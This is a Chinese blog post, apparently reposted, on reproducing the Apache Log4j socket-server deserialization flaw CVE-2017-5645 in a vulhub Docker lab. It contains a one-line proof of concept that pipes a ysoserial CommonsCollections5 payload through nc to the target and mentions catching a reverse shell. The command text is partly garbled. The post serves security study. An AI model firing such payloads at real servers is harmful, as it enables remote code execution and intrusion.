我是靠谱客的博主 无限唇膏,最近开发中收集的这篇文章主要介绍Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

v2-05df76c7e6ff6d3e45310bed659c086d_b.jpg


由于最近项目遇到这个漏洞,复现学习一下。

一、漏洞介绍

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

二、漏洞环境

github.com/vulhub/vulhu

执行如下命令启动漏洞环境

docker-compose up -d

下载环境


v2-9ebfdff1322a40abe13e3186aa65530d_b.jpg


服务开启


v2-3722ba9fb4f57dd0a5199e7c5e52db2e_b.png


三、漏洞复现

先要下载一个:

ysoserial-master-30099844c6-1.jar

地址:

源码下载地址 :

codeload.github.com/fro

jar包下载地址:

jitpack.io/com/github/f

ysoserial简介

ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议自己私下分析学习时使用低版本JDK JDK版本建议在1.7u21以下。

poc执行:

java-jar ysoserial-master-30099844c6-1.jar CommonsCollections5"需要执行的脚本base64 encode"| nc192.168.0.1024712

执行poc


v2-ca3fca0f6edee77da0141789ca7acdda_b.png


接收反弹shell


v2-e9ad127c4f0eced40c69fd545c170f04_b.jpg


四、参考:

paper.seebug.org/1171/

github.com/vulhub/vulhu

后台回复"ysoserial"也可下载ysoserial-master-30099844c6-1.jar

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

最后

以上就是无限唇膏为你收集整理的Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现的全部内容,希望文章能够帮你解决Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(55)

评论列表共有 0 条评论

立即
投稿
返回
顶部